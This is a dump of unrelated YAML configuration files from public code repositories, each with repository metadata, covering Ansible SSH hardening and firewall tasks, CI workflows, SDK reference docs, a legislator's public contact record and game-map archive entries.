[ "Unlicense" ]
null
null
null
- ansible.builtin.debug: msg: - 'sshd-hostbasedauthentication-off.yml' - ansible.builtin.lineinfile: path: '/etc/ssh/sshd_config' create: false regexp: '(?i)^\s*HostbasedAuthentication\s+' state: 'absent' - ansible.builtin.lineinfile: path: '/etc/ssh/sshd_config' create: true line: 'HostbasedAuthentication no' state: 'present' insertbefore: '^[#\s]*Match' validate: '/usr/sbin/sshd -t -f %s'
24.777778
48
0.650224
4e94a82adc904bbbeb6c37d1bb13a7bbd7edaf87
909
yml
YAML
data/ky/people/Chris-Harris-8c9366c3-0ef4-48c4-9292-490a216a1815.yml
benrkaplan/people
ed6c93161b22103736042db599187d9782285e37
[ "CC0-1.0" ]
null
null
null
data/ky/people/Chris-Harris-8c9366c3-0ef4-48c4-9292-490a216a1815.yml
benrkaplan/people
ed6c93161b22103736042db599187d9782285e37
[ "CC0-1.0" ]
null
null
null
data/ky/people/Chris-Harris-8c9366c3-0ef4-48c4-9292-490a216a1815.yml
benrkaplan/people
ed6c93161b22103736042db599187d9782285e37
[ "CC0-1.0" ]
null
null
null
id: ocd-person/8c9366c3-0ef4-48c4-9292-490a216a1815 name: Chris Harris party: - name: Democratic roles: - district: '93' jurisdiction: ocd-jurisdiction/country:us/state:ky/government type: lower contact_details: - address: 702 Capital Ave;Annex Room 457C;Frankfort, KY 40601 note: Capitol Office voice: 502-564-8100 ext. 635 email: chris.harris@lrc.ky.gov - address: 702 Capital Ave;Annex Room 457C;Frankfort, KY 40601 email: Chris.Harris@lrc.ky.gov note: Capitol Office voice: 502-564-8100 ext. 635 links: - url: https://legislature.ky.gov/Legislators/Pages/Legislator-Profile.aspx?DistrictNumber=93 sources: - url: https://legislature.ky.gov/Legislators/Pages/Legislator-Profile.aspx?DistrictNumber=93 image: https://legislature.ky.gov/Legislators%20Full%20Res%20Images/house93.jpg other_identifiers: - identifier: KYL000226 scheme: legacy_openstates given_name: Chris family_name: Harris
32.464286
93
0.785479
c19400d14e90c1f23a59a1576acceb7febe7a9e2
268
yaml
YAML
site/data/information.yaml
scocouso/prelima
cd71b0b4d5e5204b655cdb85cf19d4a037fa048a
[ "MIT" ]
null
null
null
site/data/information.yaml
scocouso/prelima
cd71b0b4d5e5204b655cdb85cf19d4a037fa048a
[ "MIT" ]
null
null
null
site/data/information.yaml
scocouso/prelima
cd71b0b4d5e5204b655cdb85cf19d4a037fa048a
[ "MIT" ]
1
2019-06-05T17:51:26.000Z
2019-06-05T17:51:26.000Z
--- telefono_fabrica: "(51) 936 136 321" telefono_comercial: "(51) 960 145 001" email: info@prelima.com email_fabrica: rsarria@prelima.com email_comercial: info@prelima.com direccion_1: Avda. Sumac Pacha, Mz. LL, direccion_2: Lotes 3 y 4 ciudad: Lurín-Lima pais: Perú
24.363636
39
0.764925
4b6ca2fd4d66b128d39388a49b9464b34de2f19a
1,037
yml
YAML
ansible/patching_status_pages.yml
georgios-keramidas-lu/macbook
519e9029877a3622cd94df8673374e9bc0e2375d
[ "MIT" ]
null
null
null
ansible/patching_status_pages.yml
georgios-keramidas-lu/macbook
519e9029877a3622cd94df8673374e9bc0e2375d
[ "MIT" ]
null
null
null
ansible/patching_status_pages.yml
georgios-keramidas-lu/macbook
519e9029877a3622cd94df8673374e9bc0e2375d
[ "MIT" ]
1
2021-03-03T09:03:13.000Z
2021-03-03T09:03:13.000Z
--- - hosts: - app_java11 vars: page_name: app - java11 page_dir: "{{play_dir}}/app_java11" roles: - patching_status_pages - hosts: - app_dev - app_stag vars: page_name: app dev, app stag page_dir: "{{play_dir}}/dev" roles: - patching_status_pages - hosts: - app_prod vars: page_name: app prod page_dir: "{{play_dir}}/prod" roles: - patching_status_pages - hosts: - cache_prod vars: page_name: cache prod page_dir: "{{play_dir}}/cache_prod" roles: - patching_status_pages - hosts: - web_dev - web_stag vars: page_name: web dev, web stag page_dir: "{{play_dir}}/web_dev" roles: - patching_status_pages - hosts: - web_prod vars: page_name: web prod page_dir: "{{play_dir}}/web_prod" roles: - patching_status_pages - hosts: - office vars: page_name: office page_dir: "{{play_dir}}/office" roles: - patching_status_pages - hosts: localhost roles: - patching_status_server
16.203125
39
0.621986
27ec1a7189b8e7b5514e2ec37a60600a845d2081
799
yml
YAML
.travis.yml
TigerWolf/railscamps.com
feb17aee0a8d5d5628617f292ac4cffb7b2b54cf
[ "FSFAP" ]
null
null
null
.travis.yml
TigerWolf/railscamps.com
feb17aee0a8d5d5628617f292ac4cffb7b2b54cf
[ "FSFAP" ]
null
null
null
.travis.yml
TigerWolf/railscamps.com
feb17aee0a8d5d5628617f292ac4cffb7b2b54cf
[ "FSFAP" ]
null
null
null
language: ruby rvm: 2.5.3 sudo: false before_install: - pip install --upgrade --user awscli - gem update --system - gem install bundler script: bundle exec jekyll build after_script: - aws s3 cp _site s3://rails-camps-site/ --recursive --acl public-read - aws configure set preview.cloudfront true - aws cloudfront create-invalidation --distribution-id $AWS_CLOUDFRONT_ID --paths "/*" branches: only: - master env: global: - secure: A0csqPOQ9RihtpjRYp5aWv7wcxqUwFWY5+SZikd7RR5tPm1HL9MeOTcGZLsgD4Y7rk4ox8bYoJjSLzFwGzE8WBn6BQRm+itBiDHhBOJEMzwo5JQS8LUJuUiHCP9DyGMm+8Td687ZTB4JulXVDdUc+rHQNSWH/o4T8mdYozMWyI4= - secure: gVi8rrG/jbev0z9wKuOmEdbF3Ouy6khn9ekODCgVFnVW1Y1gvTCQnlIpE1YsOlzfAEHNkljIgTjQQ9rqB5ZOtOq+AK3z5h7j1SLxbEzTcrY/xQ/TBV/kF6Slym9F0I3YhDwBHricmXw/rJ1rvnft2MicRgbEGj24Vc1YKcJJeyE=
39.95
184
0.828536
7e1fed9510cfa7cbdd3da9a65b411b1fd8890ecf
4,703
yml
YAML
docs-ref-autogen/azure-core/azure.core.pipeline.transport.AioHttpTransportResponse.yml
v-xuto/azure-docs-sdk-python
0f01e3dddce7e183ce8e76f3db4489150b6f8810
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/azure-core/azure.core.pipeline.transport.AioHttpTransportResponse.yml
v-xuto/azure-docs-sdk-python
0f01e3dddce7e183ce8e76f3db4489150b6f8810
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/azure-core/azure.core.pipeline.transport.AioHttpTransportResponse.yml
v-xuto/azure-docs-sdk-python
0f01e3dddce7e183ce8e76f3db4489150b6f8810
[ "CC-BY-4.0", "MIT" ]
null
null
null
### YamlMime:UniversalReference api_name: [] items: - children: - azure.core.pipeline.transport.AioHttpTransportResponse.body - azure.core.pipeline.transport.AioHttpTransportResponse.load_body - azure.core.pipeline.transport.AioHttpTransportResponse.stream_download - azure.core.pipeline.transport.AioHttpTransportResponse.text class: azure.core.pipeline.transport.AioHttpTransportResponse fullName: azure.core.pipeline.transport.AioHttpTransportResponse inheritance: - inheritance: - inheritance: - type: builtins.object type: azure.core.pipeline.transport._base._HttpResponseBase type: azure.core.pipeline.transport._base_async.AsyncHttpResponse langs: - python module: azure.core.pipeline.transport name: AioHttpTransportResponse summary: Methods for accessing response body data. syntax: content: 'AioHttpTransportResponse(request: azure.core.pipeline.transport._base.HttpRequest, aiohttp_response: aiohttp.client_reqrep.ClientResponse, block_size=None) -> None' parameters: - description: The HttpRequest object id: request type: - azure.core.pipeline.transport.HttpRequest - description: Returned from ClientSession.request(). id: aiohttp_response type: - aiohttp.ClientResponse object - description: block size of data sent over connection. id: block_size type: - int type: class uid: azure.core.pipeline.transport.AioHttpTransportResponse - class: azure.core.pipeline.transport.AioHttpTransportResponse fullName: azure.core.pipeline.transport.AioHttpTransportResponse.body langs: - python module: azure.core.pipeline.transport name: body() -> bytes summary: Return the whole body as bytes in memory. syntax: content: body() -> bytes type: method uid: azure.core.pipeline.transport.AioHttpTransportResponse.body - class: azure.core.pipeline.transport.AioHttpTransportResponse fullName: azure.core.pipeline.transport.AioHttpTransportResponse.load_body langs: - python module: azure.core.pipeline.transport name: load_body() -> None summary: Load in memory the body, so it could be accessible from sync methods. syntax: content: load_body() -> None type: method uid: azure.core.pipeline.transport.AioHttpTransportResponse.load_body - class: azure.core.pipeline.transport.AioHttpTransportResponse fullName: azure.core.pipeline.transport.AioHttpTransportResponse.stream_download langs: - python module: azure.core.pipeline.transport name: stream_download(pipeline) -> typing.AsyncIterator[bytes] summary: Generator for streaming response body data. syntax: content: stream_download(pipeline) -> typing.AsyncIterator[bytes] parameters: - description: The pipeline object id: pipeline type: - azure.core.pipeline type: method uid: azure.core.pipeline.transport.AioHttpTransportResponse.stream_download - class: azure.core.pipeline.transport.AioHttpTransportResponse fullName: azure.core.pipeline.transport.AioHttpTransportResponse.text langs: - python module: azure.core.pipeline.transport name: 'text(encoding: typing.Union[str, NoneType] = None) -> str' summary: 'Return the whole body as a string. If encoding is not provided, rely on aiohttp auto-detection.' syntax: content: 'text(encoding: typing.Union[str, NoneType] = None) -> str' parameters: - description: The encoding to apply. id: encoding type: - str type: method uid: azure.core.pipeline.transport.AioHttpTransportResponse.text references: - fullName: azure.core.pipeline.transport.AioHttpTransportResponse.body isExternal: false name: body() -> bytes parent: azure.core.pipeline.transport.AioHttpTransportResponse uid: azure.core.pipeline.transport.AioHttpTransportResponse.body - fullName: azure.core.pipeline.transport.AioHttpTransportResponse.load_body isExternal: false name: load_body() -> None parent: azure.core.pipeline.transport.AioHttpTransportResponse uid: azure.core.pipeline.transport.AioHttpTransportResponse.load_body - fullName: azure.core.pipeline.transport.AioHttpTransportResponse.stream_download isExternal: false name: stream_download(pipeline) -> typing.AsyncIterator[bytes] parent: azure.core.pipeline.transport.AioHttpTransportResponse uid: azure.core.pipeline.transport.AioHttpTransportResponse.stream_download - fullName: azure.core.pipeline.transport.AioHttpTransportResponse.text isExternal: false name: 'text(encoding: typing.Union[str, NoneType] = None) -> str' parent: azure.core.pipeline.transport.AioHttpTransportResponse uid: azure.core.pipeline.transport.AioHttpTransportResponse.text
39.521008
96
0.773549
5a679585cfca0906eb7f555c7108bf4069f8513f
272
yml
YAML
meta/main.yml
silverlogic/ansible-pgbouncer
83198671af0dfb6fcfca811a8dccbf1629561b36
[ "Apache-2.0" ]
null
null
null
meta/main.yml
silverlogic/ansible-pgbouncer
83198671af0dfb6fcfca811a8dccbf1629561b36
[ "Apache-2.0" ]
null
null
null
meta/main.yml
silverlogic/ansible-pgbouncer
83198671af0dfb6fcfca811a8dccbf1629561b36
[ "Apache-2.0" ]
null
null
null
galaxy_info: author: The SilverLogic description: Installs and configures PgBouncer license: Apache-2.0 min_ansible_version: 2.0 platforms: - name: Debian versions: - wheezy - jessie - stretch galaxy_tags: [] dependencies: []
19.428571
48
0.650735
cc515460273279461be64aa8dad4e58480f05022
1,864
yml
YAML
.final_builds/jobs/cloudfoundry_dashboards/index.yml
sba30/prometheus-boshrelease
32754044a05f708128d0253b29a1d1679fc9de84
[ "CC-BY-3.0", "Apache-2.0" ]
null
null
null
.final_builds/jobs/cloudfoundry_dashboards/index.yml
sba30/prometheus-boshrelease
32754044a05f708128d0253b29a1d1679fc9de84
[ "CC-BY-3.0", "Apache-2.0" ]
null
null
null
.final_builds/jobs/cloudfoundry_dashboards/index.yml
sba30/prometheus-boshrelease
32754044a05f708128d0253b29a1d1679fc9de84
[ "CC-BY-3.0", "Apache-2.0" ]
null
null
null
builds: 0235c03c15c3dad69acace0a00dd54405b74c6a1: version: 0235c03c15c3dad69acace0a00dd54405b74c6a1 blobstore_id: 34d7a0f2-1804-4cb8-88e1-6ce3859c21ef sha1: 99011c47c4f37f3e11b1f60af7937d250305ae93 2d093716a145077f6c1d13e7959fc9ca37783fb8: version: 2d093716a145077f6c1d13e7959fc9ca37783fb8 blobstore_id: 71558aed-4988-4764-5394-9f43e4b91edb sha1: 2101bf8e7d34ac521251f5775d9946a172005061 2efddae8a4560f724ee6b4c1e34e1e45856bd176: version: 2efddae8a4560f724ee6b4c1e34e1e45856bd176 blobstore_id: 9ca01490-3f0c-4582-bc07-30157692b95e sha1: 0751bbea9c7732cbbdedbfbf19937cfd57213380 3191cf7fc9438338eeed0885008fcc39606ad57c: version: 3191cf7fc9438338eeed0885008fcc39606ad57c blobstore_id: 360fab2b-249e-4051-bf65-5eb340000bf4 sha1: a5c8592802cf5650cc6191144b612c54ab349e88 35fc4be341a1645acd2530daf23b1b03d1e5637f: version: 35fc4be341a1645acd2530daf23b1b03d1e5637f blobstore_id: d5287446-c37a-4ccf-49cc-59abcc389ad8 sha1: a5d96ee4ff215540c7efeb617243b6b082850bac 57fa1ba1677f5883b70d6fe3d25ce85f5a639589: version: 57fa1ba1677f5883b70d6fe3d25ce85f5a639589 blobstore_id: 8671ca3d-5f09-402c-b62d-5e082cab4791 sha1: 5b7e67199314efdd8e7eef60344bf8c38f8110c9 942cc0b9eb99305386468b184074879dcda29c14: version: 942cc0b9eb99305386468b184074879dcda29c14 blobstore_id: 57815021-fda0-4686-6e99-1830b9e694cb sha1: f624cffe2cbbf242236c1887f24cb384a8ee0c38 a8e9b70fdf779d82484332c129d197a2b0acb77f: version: a8e9b70fdf779d82484332c129d197a2b0acb77f blobstore_id: e5fb4cf0-c0c8-4c11-5dd4-9d7d23a98f2e sha1: af6f47b26a248e2a7eddb7ad0c815b13f3777fed dbeec82044b61da44d7245377d00722f1486ba7e: version: dbeec82044b61da44d7245377d00722f1486ba7e blobstore_id: ebf5f855-a228-49d8-404a-6e9842aced1b sha1: 1aede7c4f39cb1d3263af414d3e95bce54f2a919 format-version: "2"
47.794872
54
0.855687
6ddc0a4931765347351448c9896f1fc623bb7bcc
757
yml
YAML
.github/workflows/ci.yml
AdrianBinDC/Entwine
af32146e8aed715b2ad8a18f131611bfa101dfba
[ "MIT" ]
405
2019-06-24T17:24:41.000Z
2022-03-18T12:29:50.000Z
.github/workflows/ci.yml
AdrianBinDC/Entwine
af32146e8aed715b2ad8a18f131611bfa101dfba
[ "MIT" ]
21
2019-07-02T07:46:42.000Z
2021-08-02T09:03:51.000Z
.github/workflows/ci.yml
AdrianBinDC/Entwine
af32146e8aed715b2ad8a18f131611bfa101dfba
[ "MIT" ]
27
2019-06-26T15:42:05.000Z
2022-03-21T21:58:06.000Z
name: CI on: push: branches: [ master ] pull_request: branches: [ '*' ] jobs: test: name: Test runs-on: macos-latest steps: - name: Checkout uses: actions/checkout@v2 - name: Build run: | make build -C ${{ github.workspace }} 2>&1 \ | ${{ github.workspace }}/.github/workflows/ci.awk \ -v prefix=${{ github.workspace }} -v fails_on_warning=1 - name: Run Tests run: | make test -C ${{ github.workspace }} 2>&1 \ | ${{ github.workspace }}/.github/workflows/ci.awk \ -v prefix=${{ github.workspace }} -v fails_on_warning=1
25.233333
76
0.458388
7e9d5e1f3fa1a6c0be10c3b7bbf761e88e02c257
2,124
yml
YAML
content/Unreal Tournament 2004/Maps/Capture The Flag/N/1/7/442c4f/ctf-novaburst_[17442c4f].yml
acrinym/unreal-archive-data
ac9f151af3b401c10970839e7c5eb594e181e74a
[ "Unlicense" ]
20
2019-02-05T15:09:30.000Z
2022-03-06T02:04:19.000Z
content/Unreal Tournament 2004/Maps/Capture The Flag/N/1/7/442c4f/ctf-novaburst_[17442c4f].yml
acrinym/unreal-archive-data
ac9f151af3b401c10970839e7c5eb594e181e74a
[ "Unlicense" ]
496
2019-02-17T20:07:27.000Z
2022-03-28T10:35:41.000Z
content/Unreal Tournament 2004/Maps/Capture The Flag/N/1/7/442c4f/ctf-novaburst_[17442c4f].yml
acrinym/unreal-archive-data
ac9f151af3b401c10970839e7c5eb594e181e74a
[ "Unlicense" ]
15
2019-02-02T14:06:44.000Z
2022-02-24T22:40:18.000Z
--- !<MAP> contentType: "MAP" firstIndex: "2018-11-01 20:17" game: "Unreal Tournament 2004" name: "CTF-NovaBurst" author: "Megamix" description: "From a Idea By NovaBurst (Paul) to the map making of Megamix (Geoff)\ \ ....from USA to UK and back...." releaseDate: "2003-03" attachments: - type: "IMAGE" name: "CTF-NovaBurst_shot_2.png" url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/CTF-NovaBurst_shot_2.png" - type: "IMAGE" name: "CTF-NovaBurst_shot_3.png" url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/CTF-NovaBurst_shot_3.png" - type: "IMAGE" name: "CTF-NovaBurst_shot_1.png" url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/CTF-NovaBurst_shot_1.png" - type: "IMAGE" name: "CTF-NovaBurst_shot_4.png" url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/CTF-NovaBurst_shot_4.png" originalFilename: "ctf-novaburst.zip" hash: "17442c4f48a6f5fa937f865bfbeb615616648a0b" fileSize: 1513565 files: - name: "CTF-NovaBurst.ut2" fileSize: 3968572 hash: "cb0584230c679aadb9f038ec98608f25155cfbf6" otherFiles: 5 dependencies: {} downloads: - url: "https://gamebanana.com/maps/download/18790" main: false repack: false state: "OK" - url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/1/7/442c4f/ctf-novaburst.zip" main: true repack: false state: "OK" - url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/1/7/442c4f/ctf-novaburst.zip" main: false repack: false state: "OK" - url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament%202004/Maps/Capture%20The%20Flag/N/1/7/442c4f/ctf-novaburst.zip" main: false repack: false state: "OK" deleted: false gametype: "Capture The Flag" title: "CTF-NovaBurst" playerCount: "Unknown" themes: Tech: 0.9 Industrial: 0.1 bots: true
37.263158
152
0.757062
7d400484b02ff2d59309772212943b7b073f7a13
457
yaml
YAML
expr/ztests/has-2.yaml
brimdata/zq
9076f1cbc23cc72b1c2e17ba10ee06722bce2e8d
[ "BSD-3-Clause" ]
null
null
null
expr/ztests/has-2.yaml
brimdata/zq
9076f1cbc23cc72b1c2e17ba10ee06722bce2e8d
[ "BSD-3-Clause" ]
6
2021-03-29T23:46:25.000Z
2021-03-30T15:45:26.000Z
expr/ztests/has-2.yaml
brimdata/zq
9076f1cbc23cc72b1c2e17ba10ee06722bce2e8d
[ "BSD-3-Clause" ]
null
null
null
zed: | cut r:=has(r), rb:=has(r.b), both:=has(r,r.b), div0:=has(s/0), add1:=has(s+1), s:=has(s), array:=has(array[0]), arraynot:=has(array[4]) input: | {r:{a:1(int32)},s:123(int32),array:[1,2,3]} {r:{a:1(int8),b:2(int8)}} output: | {r:true,rb:false,both:false,div0:"divide by zero"(error),add1:true,s:true,array:true,arraynot:false} {r:true,rb:true,both:true,div0:false,add1:false,s:false,array:false,arraynot:false}
25.388889
102
0.599562
14b0bb27714cb95a8b2f2e5a3f8520e05d52dea4
4,345
yml
YAML
.github/workflows/build.yml
WebKitForWayland/wpe
8a7603e11b5680e7a9f2e17e8c5fd9e7d0f04f1c
[ "BSD-2-Clause" ]
null
null
null
.github/workflows/build.yml
WebKitForWayland/wpe
8a7603e11b5680e7a9f2e17e8c5fd9e7d0f04f1c
[ "BSD-2-Clause" ]
19
2017-10-06T16:42:43.000Z
2018-08-20T21:22:00.000Z
.github/workflows/build.yml
WebKitForWayland/wpe
8a7603e11b5680e7a9f2e17e8c5fd9e7d0f04f1c
[ "BSD-2-Clause" ]
8
2017-03-13T10:10:03.000Z
2018-08-10T17:02:33.000Z
--- name: CI Build on: push: branches: - master - 'libwpe-*' pull_request: branches: - master jobs: linux: runs-on: ubuntu-18.04 steps: - name: Checkout uses: actions/checkout@v2 - name: Install Debian Packages run: | sudo apt update sudo apt install -y cmake flex libjson-glib-dev libxkbcommon-dev \ libegl1-mesa-dev libxml2-dev libxslt1-dev libyaml-dev llvm-dev \ libclang-dev libglib2.0-dev ninja-build - name: Setup Python uses: actions/setup-python@v2 with: python-version: 3.6 - name: Python Package Cache uses: actions/cache@v2 with: path: ~/.cache/pip key: ${{ runner.os }}-pip-${{ hashFiles('.github/workflows/ci.yml') }} restore-keys: ${{ runner.os }}-pip- - name: Install Python Packages run: | python -m pip install --upgrade pip setuptools wheel HOTDOC_BUILD_C_EXTENSION=enabled pip install hotdoc meson==0.55 - name: Meson - Configure run: | mkdir -p _work/meson meson _work/meson/build --prefix /usr -Dbuild-docs=true - name: Meson - Build run: | ninja -C _work/meson/build - name: Meson - Install run: | DESTDIR="$(pwd)/_work/meson/prefix" ninja -C _work/meson/build install nm -D -P _work/meson/build/libwpe-1.0.so \ | awk '$2 == "T" || $2 == "U" {print $2 " " $1}' \ > _work/meson/symbols (cd _work/meson/prefix && find lib -type f | sort) > _work/meson/files - name: Meson - Archive Artifacts uses: actions/upload-artifact@v2 with: name: build-meson path: _work/meson/prefix - name: CMake - Configure run: | mkdir -p _work/cmake/build && cd $_ cmake -DCMAKE_INSTALL_PREFIX=/usr -DBUILD_DOCS=ON ../../.. - name: CMake - Build run: | make -C _work/cmake/build -j$(nproc) - name: CMake - Install run: | DESTDIR="$(pwd)/_work/cmake/prefix" make -C _work/cmake/build install nm -D -P _work/cmake/build/libwpe-1.0.so \ | awk '$2 == "T" || $2 == "U" {print $2 " " $1}' \ > _work/cmake/symbols (cd _work/cmake/prefix && find lib -type f | sort) > _work/cmake/files - name: CMake - Archive Artifacts uses: actions/upload-artifact@v2 with: name: build-cmake path: _work/cmake/prefix - name: Check Installations run: | diff -u _work/{cmake,meson}/files diff -u _work/{cmake,meson}/symbols diff -Naur _work/{cmake,meson}/prefix/usr/include/ - name: Archive Documentation uses: actions/upload-artifact@v2 with: name: docs path: _work/cmake/build/Documentation/html publish: if: ${{ github.ref == 'refs/heads/master' }} needs: linux runs-on: ubuntu-18.04 steps: - name: Fetch Documentation uses: actions/download-artifact@v2 with: name: docs path: html - name: Deploy Documentation uses: peaceiris/actions-gh-pages@v3 with: github_token: ${{ secrets.GITHUB_TOKEN }} force_orphan: true publish_dir: html windows: runs-on: windows-latest env: PYTHONIOENCODING: "utf-8" steps: - name: Checkout uses: actions/checkout@v2 - name: Setup Python uses: actions/setup-python@v2 with: python-version: 3.6 - name: Setup MSVC uses: seanmiddleditch/gha-setup-vsdevenv@master - name: Install Tools run: | choco install winflexbison3 ninja -y --no-progress --stop-on-first-failure - name: Install Python Packages run: | python -m pip install --upgrade pip setuptools wheel python -m pip install meson==0.56 - name: Meson - Configure run: >+ meson _build -Dbuild-docs=false -Dlibxkbcommon:enable-docs=false -Dlibxkbcommon:enable-wayland=false -Dlibxkbcommon:enable-x11=false -Dlibxkbcommon:enable-xkbregistry=false - name: Meson - Build run: | ninja -C _build
32.185185
84
0.560875
14e659d0f0ac42d541e9308360db23d167a05179
168
yml
YAML
.poggit.yml
MCPEAbdu77/NoDropsPE
b3f0efcb62769a4348b35294fa55ebbd3f257c87
[ "MIT" ]
3
2021-08-28T08:50:07.000Z
2021-09-02T02:25:44.000Z
.poggit.yml
MCPEAbdu77/NoDropsPE
b3f0efcb62769a4348b35294fa55ebbd3f257c87
[ "MIT" ]
null
null
null
.poggit.yml
MCPEAbdu77/NoDropsPE
b3f0efcb62769a4348b35294fa55ebbd3f257c87
[ "MIT" ]
null
null
null
--- # Poggit-CI Manifest. Open the CI at https://poggit.pmmp.io/ci/MCPEAbdu77/NoDropsPE build-by-default: true branches: - main projects: NoDropsPE: path: "" ...
18.666667
87
0.690476
079af24318b312ff592e3c8337998ae2d8939430
683
yml
YAML
vendor/github.com/onsi/ginkgo/.travis.yml
pliurh/test-operator
49045c36efb9136813f049b9977fe2b93c0a46c0
[ "Apache-2.0" ]
84,910
2015-08-12T17:45:55.000Z
2022-03-31T23:39:40.000Z
vendor/github.com/onsi/ginkgo/.travis.yml
pliurh/test-operator
49045c36efb9136813f049b9977fe2b93c0a46c0
[ "Apache-2.0" ]
98,305
2015-08-12T17:35:13.000Z
2022-03-31T23:46:47.000Z
vendor/github.com/onsi/ginkgo/.travis.yml
pliurh/test-operator
49045c36efb9136813f049b9977fe2b93c0a46c0
[ "Apache-2.0" ]
36,592
2015-08-12T18:36:13.000Z
2022-03-31T16:22:17.000Z
language: go go: - 1.13.x - 1.14.x - tip cache: directories: - $GOPATH/pkg/mod # allow internal package imports, necessary for forked repositories go_import_path: github.com/onsi/ginkgo install: - GO111MODULE="off" go get -v -t ./... - GO111MODULE="off" go get golang.org/x/tools/cmd/cover - GO111MODULE="off" go get github.com/onsi/gomega - GO111MODULE="off" go install github.com/onsi/ginkgo/ginkgo - export PATH=$PATH:$HOME/gopath/bin script: - GO111MODULE="on" go mod tidy - diff -u <(echo -n) <(git diff go.mod) - diff -u <(echo -n) <(git diff go.sum) - $HOME/gopath/bin/ginkgo -r --randomizeAllSpecs --randomizeSuites --race --trace && go vet
26.269231
93
0.676428
2bce6cf2e591cd8ca9e0e99345c6183b64d6b9b5
1,267
yml
YAML
app/config/security.yml
youngblood67/CallOfOffer
dc6aa80474a1b43ff0461398e38d2f592794facd
[ "MIT" ]
null
null
null
app/config/security.yml
youngblood67/CallOfOffer
dc6aa80474a1b43ff0461398e38d2f592794facd
[ "MIT" ]
null
null
null
app/config/security.yml
youngblood67/CallOfOffer
dc6aa80474a1b43ff0461398e38d2f592794facd
[ "MIT" ]
1
2018-09-24T12:33:42.000Z
2018-09-24T12:33:42.000Z
# app/config/security.yml security: encoders: CoreBundle\Entity\User: bcrypt role_hierarchy: ROLE_VIWAMETAL: ROLE_USER ROLE_PROVIDER: ROLE_USER ROLE_ADMIN: ROLE_USER ROLE_SUPER_ADMIN: [ROLE_USER, ROLE_ADMIN, ROLE_ALLOWED_TO_SWITCH] providers: main: id: fos_user.user_provider.username firewalls: dev: pattern: ^/(_(profiler|wdt)|css|images|js)/ security: false main_login: pattern: ^/login$ anonymous: true reinit: pattern: ^/reinit anonymous: true creation_viwa_user: pattern: ^/createViwaUser anonymous: true # creation_provider1: # pattern: ^/synchro2 # anonymous: true # creation_provider2: # pattern: ^/synchro3 # anonymous: true main: pattern: ^/ anonymous: false provider: main form_login: login_path: fos_user_security_login check_path: fos_user_security_check success_handler: authentication.handler.login_success_handler logout: path: fos_user_security_logout target: fos_user_security_login remember_me: secret: %secret% access_control: #- { path: ^/login, roles: IS_AUTHENTICATED_ANONYMOUSLY, requires_channel:https }
21.474576
85
0.662983
ecede6abf20eb9c43feb7c76fedec533d9165aaf
1,434
yaml
YAML
ybk/conf.d/zgyoubi.yaml
sopnic/ybk
e829aeed0ad867e62b372df357157f9b72bb4b15
[ "MIT" ]
null
null
null
ybk/conf.d/zgyoubi.yaml
sopnic/ybk
e829aeed0ad867e62b372df357157f9b72bb4b15
[ "MIT" ]
null
null
null
ybk/conf.d/zgyoubi.yaml
sopnic/ybk
e829aeed0ad867e62b372df357157f9b72bb4b15
[ "MIT" ]
1
2021-06-23T19:19:03.000Z
2021-06-23T19:19:03.000Z
url: http://www.zgyoubi.com/ name: 沈阳中港大宗商品交易市场邮币卡交易中心 abbr: 中港邮币卡 notrade: cashout: 2 stock: index: http://www.zgyoubi.com/news.php?classid=79&class1id=194 relative: http://www.zgyoubi.com/ detail: (\d+-\d+<[^>]*><[^>]*>\d+)<[^>]*>(<[^>]*>\s*)+<a href="([^"]*)"[^>]*><font[^>]*>([^<]*) fields: [published_at, _, url, title] encoding: utf-8 page: maxpage: 1 offer: index: http://www.zgyoubi.com/news.php?classid=79&class1id=197 relative: http://www.zgyoubi.com/ detail: (\d+-\d+<[^>]*><[^>]*>\d+)<[^>]*>(<[^>]*>\s*)+<a href="([^"]*)"[^>]*><font[^>]*>([^<]*) fields: [published_at, _, url, title] encoding: utf-8 page: maxpage: 1 result: index: http://www.zgyoubi.com/news.php?classid=79&class1id=198 relative: http://www.zgyoubi.com/ detail: (\d+-\d+<[^>]*><[^>]*>\d+)<[^>]*>(<[^>]*>\s*)+<a href="([^"]*)"[^>]*><font[^>]*>([^<]*) fields: [published_at, _, url, title] encoding: utf-8 page: maxpage: 1 opening: url: http://www.zgbce.com/zhuanqu.php?classid=55&class1id=148 guide: http://www.zgbce.com/zhuanqu.php?classid=55&class1id=165 bank: [农业银行] code: [无] name: [沈阳中港商品交易所] download: http://zgbce.com/news_look.php?id=198 quote: realtime: url: http://112.65.240.204:10205/tradeweb/hq/getHqV_lbData.jsp type: getHqV_lbData history: url: http://180.235.68.101:20104 type: sysframe
32.590909
99
0.560669
713279d1bcc55dcedefd2fbc74d72bf2e78092e8
659
yml
YAML
includes/ufw/ufw.yml
RNCTX/ngobox
749bea36f765ca2aa9ea6e5c0786137caf4c7499
[ "MIT" ]
null
null
null
includes/ufw/ufw.yml
RNCTX/ngobox
749bea36f765ca2aa9ea6e5c0786137caf4c7499
[ "MIT" ]
null
null
null
includes/ufw/ufw.yml
RNCTX/ngobox
749bea36f765ca2aa9ea6e5c0786137caf4c7499
[ "MIT" ]
null
null
null
- name: Install ufw... apt: name: ufw - name: Set up ufw firewall... ufw: state: disabled default: deny - name: Allow SSH, port 80, and port 443 from the internet, restrict all others... ufw: rule: allow port: "{{ item.port }}" proto: tcp loop: - { port: '443' } - { port: '80' } - { port: '22' } register: ufw_allow - name: Enable ufw... ufw: state: enabled when: ufw_allow.changed == true - name: Ensure ufw service is enabled... systemd: name: ufw enabled: true state: restarted
21.258065
86
0.490137
a8c455cba0dda47280b4004c7a8789880817e2e3
281
yaml
YAML
infra-playbooks/registrator.yaml
elek/bigdata-docker
301c5c78dab4db568fb03199a067f296ed9f4042
[ "Apache-2.0" ]
31
2017-01-04T18:04:20.000Z
2021-07-15T14:28:26.000Z
infra-playbooks/registrator.yaml
